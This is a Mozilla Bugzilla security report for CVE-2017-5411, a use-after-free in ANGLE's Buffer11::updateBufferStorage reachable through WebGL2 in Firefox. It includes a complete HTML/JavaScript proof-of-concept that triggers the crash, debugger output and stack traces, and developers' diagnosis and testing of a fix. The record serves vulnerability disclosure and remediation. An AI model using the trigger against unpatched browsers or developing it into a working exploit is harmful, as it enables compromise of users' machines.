Closed Bug 1325511 (CVE-2017-5411) Opened 3 years ago Closed 3 years ago

libGLES - Use After Free in Buffer11::updateBufferStorage()

Categories

(Core :: Canvas: WebGL, defect, critical)

53 Branch
x86
Windows 10
defect
Not set
critical

Tracking

()

RESOLVED FIXED
mozilla54
Tracking Status
firefox-esr45 --- unaffected
firefox51 --- wontfix
firefox52 + fixed
firefox-esr52 --- fixed
firefox53 + fixed
firefox54 + fixed

People

(Reporter: loobenyang, Assigned: milan)

References

Details

(4 keywords, Whiteboard: [post-critsmash-triage][adv-main52+])

Attachments

(5 files)

Reproduction test case:

	<html><body ><canvas id="test"></canvas></body><script>
	var canvas0=document.getElementById("test");
	var gl = canvas0.getContext("webgl2");
	var buffer0= gl.createBuffer();
	gl.bindBuffer(gl.UNIFORM_BUFFER, buffer0); 
	gl.bindBuffer(gl.ARRAY_BUFFER, buffer0); 
	var myImage = new Image();myImage.src = "non.jpg";myImage.onerror = function(){ canvas0.width = "418";} 
	var observer0 =new MutationObserver(function listener1(event) {
	if( typeof listener1.counter == "undefined"){listener1.counter = 0;}
	if(listener1.counter > 3) return;
	listener1.counter++;
	var vertices  = [ 1.0,  1.0,  0.0,  -1.0, 1.0,  0.0,  1.0,  -1.0, 0.0, -1.0, -1.0, 0.0]; 
	gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(vertices), gl.STATIC_DRAW);; 
	canvas0.width = "418";
	gl.bufferData(gl.UNIFORM_BUFFER, 2626,gl.STATIC_COPY); 
	}); observer0.observe(canvas0, {attributes: true});
	var timeout0 = setTimeout(function(){  gl.bufferData(gl.ARRAY_BUFFER, 2167,gl.STREAM_DRAW); }, 74);
	</script></html>


Steps to reproduce: 
	1. Open the test case UAF_updateBufferStorage_Repro.html in Firefox browser.


Firefox version: 53.0a1 (2016-12-22) (32-bit)
OS: Windows 10


Stack trace:

	(615c.6088): Access violation - code c0000005 (!!! second chance !!!)
	eax=e5e5e5e5 ebx=11ab9280 ecx=11ab9280 edx=0dc8ba00 esi=11afc280 edi=11afc280
	eip=65181b4d esp=010fdea4 ebp=010fded8 iopl=0         nv up ei pl zr na pe nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
	libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
	65181b4d ff5008          call    dword ptr [eax+8]    ds:002b:e5e5e5ed=????????
	2:059> !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************


	FAULTING_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65181b4d (libGLESv2!rx::Buffer11::updateBufferStorage+0x000000db)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5ed
	Attempt to read from address e5e5e5ed

	FAULTING_THREAD:  00006088

	PROCESS_NAME:  firefox.exe

	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_PARAMETER1:  00000000

	EXCEPTION_PARAMETER2:  e5e5e5ed

	READ_ADDRESS:  e5e5e5ed 

	FOLLOWUP_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]

	NTGLOBALFLAG:  400

	APPLICATION_VERIFIER_FLAGS:  0

	APP:  firefox.exe

	ANALYSIS_VERSION: 10.0.10240.9 x86fre

	BUGCHECK_STR:  INVALID_POINTER_READ_IN_CALL

	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL

	LAST_CONTROL_TRANSFER:  from 6518175f to 65181b4d

	STACK_TEXT:  
	010fded8 6518175f 010fdefc 11ab9280 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xdb
	010fdf08 65180d5c 010fdf20 00000000 1189ac40 libGLESv2!rx::Buffer11::getBufferStorage+0x85
	010fdf34 65180e2e 010fdf50 00000000 1189ac40 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
	010fdf64 65180cad 010fdf88 00008892 1159b000 libGLESv2!rx::Buffer11::setSubData+0x94
	010fdf94 65213ca0 010fdfbc 00008892 1159b000 libGLESv2!rx::Buffer11::setData+0x29
	010fdfd4 6514a85d 00008892 00000877 1159b000 libGLESv2!gl::Context::bufferData+0x34
	010fdff0 67e716e5 00008892 00000877 1159b000 libGLESv2!gl::BufferData+0x40
	010fe010 682c7787 00008892 00000877 1159b000 xul!mozilla::gl::GLContext::fBufferData+0x1a
	010fe070 682ce0fd 00008892 00000877 1159b000 xul!mozilla::WebGLBuffer::BufferData+0xc3
	010fe0a8 682ce03e 00008892 00000877 1159b000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
	010fe0e0 6817cb2e 00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
	010fe160 672dee29 075a2000 010fe1b8 118db800 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x2d8
	010fe204 672de265 00000000 075a2000 00000000 xul!js::InternalCallOrConstruct+0x5b9
	010fe228 672eb010 075a2000 00000001 11b3d200 xul!InternalCall+0xb5
	010feb68 67864471 010fec80 010fec80 010fec80 xul!Interpret+0x5990
	010febf8 672deb00 075a2000 010fec70 010fed30 xul!js::RunScript+0x231
	010fec94 672cbfb8 00000000 010fedec 075a2000 xul!js::InternalCallOrConstruct+0x290
	010fecbc 672cb707 010fee38 010feed8 010fee08 xul!js::Call+0x81
	010fedb4 671916d5 010feed8 010fee38 010fee08 xul!JS::Call+0x107
	010feeac 67191550 075a2000 010feed8 11ad2adc xul!mozilla::dom::Function::Call+0x14f
	010ff004 6719133d 010ff038 11ad2adc 010ff080 xul!mozilla::dom::Function::Call<nsCOMPtr<nsISupports> >+0xc1
	010ff160 67192647 11ac8520 10f3dce0 11a82010 xul!nsGlobalWindow::RunTimeoutHandler+0x148
	010ff204 67190e54 11ac8520 0000000d 11ac8520 xul!mozilla::dom::TimeoutManager::RunTimeout+0x2b8
	010ff218 672b6373 11a6d910 11ac8520 11a82010 xul!mozilla::dom::`anonymous namespace'::TimerCallback+0x1f
	010ff290 672b62c4 115285c0 115285f4 00000000 xul!nsTimerImpl::Fire+0x9b
	010ff2cc 67193ae0 11a82010 0170e160 090d7a04 xul!nsTimerEvent::Run+0x45
	010ff2f0 67193a63 68f96ac4 010ff36c 67269171 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	010ff2fc 67269171 11ab9240 01704980 6974b601 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
	010ff36c 67194b98 0170e160 6974b601 010ff387 xul!nsThread::ProcessNextEvent+0x14d
	010ff388 672678a7 010ff560 01704970 010ff560 xul!NS_ProcessNextEvent+0x16
	010ff3b0 67c133d1 010ff560 010ff560 00000000 xul!mozilla::ipc::MessagePump::Run+0xcc
	010ff3cc 673454f9 010ff560 c0f8122d 090d7a00 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x58
	010ff404 673454c8 0170e160 00000002 090d7a00 xul!MessageLoop::RunHandler+0x20
	010ff424 67535f2e 01704970 010ff560 010ff444 xul!MessageLoop::Run+0x19
	010ff434 67535cbd 090d7a00 01704970 010ff458 xul!nsBaseAppShell::Run+0x34
	010ff444 68a23084 090d7a00 01704970 090d7a00 xul!nsAppShell::Run+0x26
	010ff458 67c1338f 010ff560 01704970 010ff4a0 xul!XRE_RunAppShell+0x26
	010ff468 673454f9 010ff560 c0f81289 00000003 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x16
	010ff4a0 673454c8 0172a000 00000001 69019200 xul!MessageLoop::RunHandler+0x20
	010ff4c0 68a22d9b 01701040 0000000b 00000000 xul!MessageLoop::Run+0x19
	010ff62c 002b9ce9 0000000b 01701040 010ff64c xul!XRE_InitChildProcess+0x55f
	010ff658 002b7e22 6f1672e4 6f1672ec 013c7298 firefox!content_process_main+0x70
	010ff9e4 002b5e37 0000000c ffcd16c0 013cbd50 firefox!wmain+0x4e92
	010ffa2c 772b38f4 00e4f000 772b38d0 d8aedd39 firefox!__scrt_common_main_seh+0xf9
	010ffa40 77d65de3 00e4f000 d87b03d4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	010ffa88 77d65dae ffffffff 77d8b7e7 00000000 ntdll!__RtlUserThreadStart+0x2f
	010ffa98 00000000 002b5ead 00e4f000 00000000 ntdll!_RtlUserThreadStart+0x1b


	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp

	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp

	FAULTING_SOURCE_LINE_NUMBER:  807

	FAULTING_SOURCE_CODE:  
	   803:             latestBuffer = stagingBuffer;
	   804:         }
	   805: 
	   806:         CopyResult copyResult = CopyResult::NOT_RECREATED;
	>  807:         ANGLE_TRY_RESULT(storage->copyFromStorage(latestBuffer, sourceOffset, storageSize, 0),
	   808:                          copyResult);
	   809:         // If the D3D buffer has been recreated, we should update our serial.
	   810:         if (copyResult == CopyResult::RECREATED)
	   811:         {
	   812:             updateSerial();


	SYMBOL_STACK_INDEX:  0

	SYMBOL_NAME:  libglesv2!rx::Buffer11::updateBufferStorage+db

	FOLLOWUP_NAME:  MachineOwner

	MODULE_NAME: libGLESv2

	IMAGE_NAME:  libGLESv2.dll

	DEBUG_FLR_IMAGE_TIMESTAMP:  585bd734

	STACK_COMMAND:  ~59s ; kb

	BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db

	PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db

	FAILURE_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL

	FAILURE_EXCEPTION_CODE:  c0000005

	FAILURE_IMAGE_NAME:  libGLESv2.dll

	FAILURE_FUNCTION_NAME:  rx::Buffer11::updateBufferStorage

	FAILURE_SYMBOL_NAME:  libGLESv2.dll!rx::Buffer11::updateBufferStorage

	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_c0000005_libGLESv2.dll!rx::Buffer11::updateBufferStorage

	ANALYSIS_SOURCE:  UM

	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_in_call_c0000005_libglesv2.dll!rx::buffer11::updatebufferstorage

	FAILURE_ID_HASH:  {7530445f-e192-bd84-04e5-903b912a400c}

	Followup:     MachineOwner
	---------


	
Variables shows that the storage object had been freed:


	storage	0x11ab9280 class rx::Buffer11::BufferStorage *
	 angle::NonCopyable	class angle::NonCopyable
	 __vfptr	0xe5e5e5e5 
	 mRenderer	0xe5e5e5e5 class rx::Renderer11 *
	 mRevision	0xe5e5e5e5
	 mUsage	0n-437918235 (No matching enumerant)
	 mBufferSize	0xe5e5e5e5
	sourceOffset	0
	storageSize	0xa42
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<rx::Buffer11::BufferStorage *>
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<enum rx::`anonymous namespace'::CopyResult>
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<rx::Buffer11::NativeStorage *>
	copyResult	<Value unavailable>
	latestBuffer	0x11afc280 class rx::Buffer11::BufferStorage *
	rx::BufferD3D::mNextSerial	<Value unavailable>
	this	0x11afc280 class rx::Buffer11 *
	 __vtcast_rx::Buffer11::NativeStorage	class rx::Buffer11::NativeStorage
	 rx::BufferD3D	class rx::BufferD3D
	 mRenderer	0x68f8ec90 class rx::Renderer11 *
	 mSize	0x68f8bc90
	 mMappedStorage	0x00000000 class rx::Buffer11::BufferStorage *
	 mBufferStorages	class std::array<rx::Buffer11::BufferStorage *,8>
	 mDeallocThresholds	class std::array<unsigned int,8>
	 mIdleness	class std::array<unsigned int,8>
	 mConstantBufferRangeStoragesCache	class std::map<long,rx::Buffer11::ConstantBufferCacheEntry,std::less<long>,std::allocator<std::pair<long const ,rx::Buffer11::ConstantBufferCacheEntry> > >
	 mConstantBufferStorageAdditionalSize	0
	 mMaxConstantBufferLruCount	0
	 mStaticBroadcastChannel	class angle::BroadcastChannel
	 mDirectBroadcastChannel	class angle::BroadcastChannel
Can't reproduce on a 32-bit 2016-12-22 nightly build on Windows 7. Will try on Win10 tomorrow if someone doesn't beat me to it.
Group: core-security → gfx-core-security
Flags: sec-bounty?
Summary: WebGL - Use After Free in Buffer11::updateBufferStorage() → libGLES - Use After Free in Buffer11::updateBufferStorage()
Is there anyone working on it? It can still be triggered instantly in today's nightly build.

53.0a1 (2017-01-12) (32-bit)

(62e8.44b0): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=117f0800 ecx=117f0800 edx=0d991300 esi=11145b20 edi=11145b20
eip=68f11d48 esp=00d3dc4c ebp=00d3dc80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
68f11d48 ff5008          call    dword ptr [eax+8]    ds:002b:e5e5e5ed=????????
I can't reproduce on Windows 10.  What's your graphics section of about:support?
(In reply to Milan Sreckovic [:milan] from comment #3)
> I can't reproduce on Windows 10.  What's your graphics section of
> about:support?

Screenshot for my about:support has been attached in Graphics_aboutsupport.JPG.

Did you run Windows 10 from a real PC or a virtual machine?
virtual machine does not have graphic card, might not be able to excerse the WebGL code.
Right - I'm on Windows 10, Intel+Nvidia.
It'd be interesting to see if this is hardware specific, or just intermittent, but given that it happens for you all the time and not for others that started, it could be hardware specific (or at least timing dependent.)
    Looking at the stack (recall that "storage" is what shows up freed):

    [1] Buffer11::getSystemMemoryStorage calls getBufferStorage with BUFFER_USAGE_SYSTEM_MEMORY
    [2] This allocates or sets "storage" from mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
    [3] We call Buffer11::updateBufferStorage with storage
    [4] Assuming we get into the nested if condition, where we call Buffer11::getStagingStorage()
    [5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
    [6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
    [7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY

    Note that we haven't called markBufferUsage with BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after [3] completes), which means that we haven't called mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide to deallocate that storage.

    And we end up with UAF.

    I have no proof of this, I can't reproduce the problem :)

    Looben, can you do local builds, or would you mind running a treeherder build I put together for you?
(In reply to Milan Sreckovic [:milan] from comment #8)
>     Looking at the stack (recall that "storage" is what shows up freed):
> 
>     [1] Buffer11::getSystemMemoryStorage calls getBufferStorage with
> BUFFER_USAGE_SYSTEM_MEMORY
>     [2] This allocates or sets "storage" from
> mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
>     [3] We call Buffer11::updateBufferStorage with storage
>     [4] Assuming we get into the nested if condition, where we call
> Buffer11::getStagingStorage()
>     [5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
>     [6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
>     [7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY
> 
>     Note that we haven't called markBufferUsage with
> BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after
> [3] completes), which means that we haven't called
> mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide
> to deallocate that storage.
> 
>     And we end up with UAF.
> 
>     I have no proof of this, I can't reproduce the problem :)
> 
>     Looben, can you do local builds, or would you mind running a treeherder
> build I put together for you?

Sure, please let me know once you done generating  a treeherder build.
This will have the build with the possible fix: https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1

If that doesn't fix it (or even if it does, to confirm what I think could be happening), this is a debug build that should hopefully assert instead of crashing: https://treeherder.mozilla.org/#/jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256

Give them until tomorrow to be ready :)
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
> 
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
> 
> Give them until tomorrow to be ready :)

Just tried with the win8 64bit op build from  https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1 with the exact same test case, could not reproduce it.


To make sure, I downloaded a normal 64 bit nightly and can reproduce it:


53.0a1 (2017-01-16) (64-bit)

(4624.405c): Access violation - code c0000005 (!!! second chance !!!)
libGLESv2!rx::Buffer11::updateBufferStorage+0x330:
00007ffe`37fa71e4 41ff5210        call    qword ptr [r10+10h] ds:e5e5e5e5`e5e5e5f5=????????????????
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
> 
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
> 
> Give them until tomorrow to be ready :)

In the given debug build, it did hit an assert:

err: rx::Buffer11::updateBufferStorage(803): 	! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer
Great help, thanks Looben!
Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well.  Either way, can you help opening a Chrome security bug and maybe CC one of their security people on this bug, or we can copy the details?
Flags: needinfo?(dveditz)
Looben - when you get the assertion you mention in comment 13, can you post here the full stack it gives you?
Flags: needinfo?(loobenyang)
(In reply to Milan Sreckovic [:milan] from comment #16)
> Looben - when you get the assertion you mention in comment 13, can you post
> here the full stack it gives you?

Sure. But windbg would not resolve symbols of this build, not sure if it's any good for you.



err: rx::Buffer11::updateBufferStorage(803): 	! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer

(2128.5814): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
ucrtbase!abort+0x4e:
00007ffe`837398fe cd29            int     29h
2:061> !analyze -v

FAULTING_IP: 
ucrtbase!abort+4e
00007ffe`837398fe cd29            int     29h

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffe837398fe (ucrtbase!abort+0x000000000000004e)
   ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000007
Subcode: 0x7 FAST_FAIL_FATAL_APP_EXIT

FAULTING_THREAD:  00005814

BUGCHECK_STR:  FATAL_APP_EXIT

DEFAULT_BUCKET_ID:  FATAL_APP_EXIT

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  0000000000000007

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 amd64fre

LAST_CONTROL_TRANSFER:  from 00007ffe8373b5c1 to 00007ffe837398fe

STACK_TEXT:  
00000082`717fca60 00007ffe`8373b5c1 : 00007ffe`00000003 00000000`00000003 00007ffe`356faa88 00007ffe`356fa240 : ucrtbase!abort+0x4e
00000082`717fca90 00007ffe`8373b8eb : 00000000`00000323 00007ffe`356faa88 00000082`717fcb18 0000020c`0000000f : ucrtbase!`anonymous namespace'::argument_list<char>::expand_if_necessary+0x11e9
00000082`717fcad0 00007ffe`354eb5e8 : 00000082`717fcc00 00000082`717fcb80 0000020c`4d707000 00007ffe`356faa60 : ucrtbase!wassert+0x5b
00000082`717fcb00 00007ffe`354d4943 : 0000020c`3f21de40 00000082`717fcc50 0000020c`3f21de40 00000000`00000000 : libGLESv2!glWaitSync+0x765a0
00000082`717fcbc0 00007ffe`354d9576 : 00000000`00000000 0000020c`3f21de40 00000082`717fcd00 00000000`00000877 : libGLESv2!glWaitSync+0x5f8fb
00000082`717fcc30 00007ffe`354e8612 : 00000000`00000000 00007ffe`2d01f9a5 00000082`717fcd48 00000000`00000000 : libGLESv2!glWaitSync+0x6452e
00000082`717fcc80 00007ffe`354e6047 : 0000020c`4d4f4000 0000020c`3f21de40 00000000`00000001 0000020c`4d4f4000 : libGLESv2!glWaitSync+0x735ca
00000082`717fcd50 00007ffe`35635f1a : 00000000`00008892 0000020c`4d752470 00000082`717fce30 00007ffe`35462321 : libGLESv2!glWaitSync+0x70fff
00000082`717fcda0 00007ffe`3563606e : 00000000`00008892 0000020c`4d4f4000 0000020c`4d752470 0000020c`4d75b000 : libGLESv2!glWaitSync+0x1c0ed2
00000082`717fcdf0 00007ffe`3545af32 : 0000020c`4d75b000 00000000`00000877 0000020c`4d4f4000 00000000`000088e0 : libGLESv2!glWaitSync+0x1c1026
00000082`717fce50 00007ffe`29406851 : 0000020c`4d4f4000 0000020c`4d76e000 00000000`00008892 00000000`00000877 : libGLESv2!gl::BufferData+0x6e
00000082`717fce90 00007ffe`294032ac : 0000020c`4d4f4000 00000000`00008892 00000000`00000877 0000020c`4d3cc858 : xul!PrintJSStack+0x2468b1
00000082`717fcec0 00007ffe`2a3d3246 : 00000082`717fcf30 00000000`000088e0 00000082`717fcf71 0000020c`4d3cc858 : xul!PrintJSStack+0x24330c
00000082`717fcf00 00007ffe`2a3e42bc : 00000000`00008892 0000020c`4d4f4000 ffffffff`fffffffe 0000020c`4d3cc880 : xul!mozilla_dump_image+0xdb6426
00000082`717fcfd0 00007ffe`2a3e412a : 00000000`00000005 00000000`00000000 00000082`717fd110 00007ffe`2c4f0d96 : xul!mozilla_dump_image+0xdc749c
00000082`717fd040 00007ffe`29f3fed8 : 00000000`00000005 00000082`717fd400 ffffffff`fffffffe 00007ffe`00005814 : xul!mozilla_dump_image+0xdc730a
00000082`717fd0c0 00007ffe`2a32d986 : 0000020c`45610088 00000082`717fd440 0000020c`45102000 00007ffe`2d691540 : xul!mozilla_dump_image+0x9230b8
00000082`717fd3e0 00007ffe`2ce7d4a3 : 0000020c`45102000 00007ffe`2a32d7cc 0000020c`4d3cc800 0000020c`45610088 : xul!mozilla_dump_image+0xd10b66
00000082`717fd470 00007ffe`2ce89359 : 0000020c`4d3bf800 00000000`00000000 00000082`717fd528 0000020c`456100a8 : xul!XRE_ParseAppData+0x12e86e3
00000082`717fd4d0 00007ffe`2ce8cdd8 : 0000020c`4d60c240 fffe020c`4ce952e0 0000020c`45102000 0000020c`4cf4712e : xul!XRE_ParseAppData+0x12f4599
00000082`717fd570 00007ffe`2ce96ce2 : 0000020c`45102208 00000000`00000000 0000020c`45102208 0000020c`45102208 : xul!XRE_ParseAppData+0x12f8018
00000082`717fe3e0 00007ffe`2ce89400 : 0000020c`45102000 00000082`717fe558 0000020c`45102000 00000082`717fe618 : xul!XRE_ParseAppData+0x1301f22
00000082`717fe510 00007ffe`2ce7d284 : 00000082`717fe618 fffe020c`4ce8a0c0 00000000`00000000 00000082`717fe550 : xul!XRE_ParseAppData+0x12f4640
00000082`717fe5b0 00007ffe`2c4f1747 : 00000082`717fe728 0000020c`45102000 00000082`717fe8b0 0000020c`45102000 : xul!XRE_ParseAppData+0x12e84c4
00000082`717fe5e0 00007ffe`2a17792e : 0000020c`4d608e40 00000082`717fe8b0 00000082`717fe760 00007ffe`2a330d99 : xul!XRE_ParseAppData+0x95c987
00000082`717fe6e0 00007ffe`29738c88 : 00000082`717feb10 0000020c`4d7a8580 00000082`717fe8b0 00007ffe`2d58b828 : xul!mozilla_dump_image+0xb5ab0e
00000082`717fe860 00007ffe`29769089 : 0000020c`4d3bf108 00000000`00000002 0000020c`4d3bf000 00000082`717feb40 : xul!mozilla_dump_image+0x11be68
00000082`717fea90 00007ffe`2982f394 : 0000020c`4c939b80 0000020c`4d752fb0 00000000`00000000 0000020c`4d753040 : xul!mozilla_dump_image+0x14c269
00000082`717fed10 00007ffe`29831e94 : 0000020c`4d752601 0000020c`4d752620 00004434`00000001 0000020c`4d3bf110 : xul!mozilla_dump_image+0x212574
00000082`717fee60 00007ffe`287a273a : 000001ba`4a76b232 0000020c`4d4f3078 00000000`00000000 0000020c`4d7526b0 : xul!mozilla_dump_image+0x215074
00000082`717fee90 00007ffe`28799066 : 0000020c`4cb63f88 00007ffe`3b273252 00000000`00000001 0000020c`3f214a00 : xul!XRE_AddStaticComponent+0x2674e
00000082`717feff0 00007ffe`2878d701 : 0000020c`4cb63f80 00000082`717ff0b8 00000000`00000001 00000000`00000000 : xul!XRE_AddStaticComponent+0x1d07a
00000082`717ff060 00007ffe`2879776d : 00000082`717ff101 0000020c`4d4f3078 00000082`717ff1a0 0000020c`3f240800 : xul!XRE_AddStaticComponent+0x11715
00000082`717ff0f0 00007ffe`28793dab : 0000020c`3f293040 00000082`717ff1b9 00000000`00000000 00000000`00000000 : xul!XRE_AddStaticComponent+0x1b781
00000082`717ff120 00007ffe`287d25ff : 0000020c`3f293040 00007ffe`28cc095e 0000020c`456e11f0 0000020c`3f214a01 : xul!XRE_AddStaticComponent+0x17dbf
00000082`717ff220 00007ffe`28cfacab : 0000020c`45d64e01 0000020c`3f214a10 00000082`717ff600 00007ffe`3b273252 : xul!NS_StringSetIsVoid+0x5edb
00000082`717ff260 00007ffe`28cfaee4 : 00000082`717ff620 00000082`717ff301 00000082`717ff620 00007ffe`2871bac9 : xul!soundtouch::SoundTouch::operator=+0x28513
00000082`717ff2c0 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff3f0 00000000`00000034 00007ffe`3b283e35 : xul!soundtouch::SoundTouch::operator=+0x2874c
00000082`717ff300 00007ffe`28cc6e02 : 0000020c`45138a58 0000020c`4513ec00 00007ffe`2e72fd90 00007ffe`28ccb9dd : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff330 00007ffe`2af35a0b : 0000020c`4513ec40 00007ffe`2a9c9c16 00000000`00000002 00000082`717ff3f0 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff380 00007ffe`2afa9b8d : 0000020c`4513ec40 0000020c`4513ec40 00000082`717ff620 00000000`00000034 : xul!mozilla_dump_image+0x1918beb
00000082`717ff3c0 00007ffe`2bb856d9 : 00000082`717ff620 00007ffe`2dd553c8 0000020c`4513ebe0 0000020c`3f214a10 : xul!mozilla_dump_image+0x198cd6d
00000082`717ff400 00007ffe`28cfadb7 : 0000020c`457fced0 00007ffe`2d1c99b0 0000020c`3f289000 00000000`00010011 : xul!XRE_RunAppShell+0x59
00000082`717ff440 00007ffe`28cc70da : 00000082`717ff620 00000082`717ff600 00000000`00000034 00000082`717ff4a0 : xul!soundtouch::SoundTouch::operator=+0x2861f
00000082`717ff480 00007ffe`28cc6e02 : 00007ffe`2d3c1ab8 00007ffe`287d9684 00007ff7`22dd4974 00007ffe`2bb7a4aa : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491e8e
00000082`717ff4b0 00007ffe`2bb8503c : 0000020c`3f289000 00000082`717ff600 00000000`00000034 0000020c`3f207580 : xul!mozilla::net::LoadInfo::TriggeringPrincipal+0x491bb6
00000082`717ff500 00007ff7`22dd1d45 : 00000000`0000000b 00000000`0000000c 0000020c`3f202080 00000000`0000000b : xul!XRE_InitChildProcess+0x888
00000082`717ff7c0 00007ff7`22dd18f9 : 0000020c`3f202080 0000020c`3f202080 00000000`0000000c 0000020c`3f202080 : firefox+0x1d45
00000082`717ff820 00007ff7`22dd266f : 00000000`0000000c 0000020c`3f2020f0 00000000`00000000 00007ffe`87fa2540 : firefox+0x18f9
00000082`717ff8a0 00007ff7`22e112e9 : 00007ffe`837b59f4 00000000`00000000 00000000`0000000d 00000082`7159c000 : firefox+0x266f
00000082`717ff900 00007ffe`86dc8102 : 00007ff7`22e113a0 00000082`7159c000 00000000`00000000 00000000`00000000 : firefox!TargetNtUnmapViewOfSection+0x6a9d
00000082`717ff940 00007ffe`87f8c5b4 : 00007ffe`86dc80e0 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x22
00000082`717ff970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x34


FOLLOWUP_IP: 
ucrtbase!abort+4e
00007ffe`837398fe cd29            int     29h

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ucrtbase!abort+4e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ucrtbase

IMAGE_NAME:  ucrtbase.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5632d193

STACK_COMMAND:  ~61s ; kb

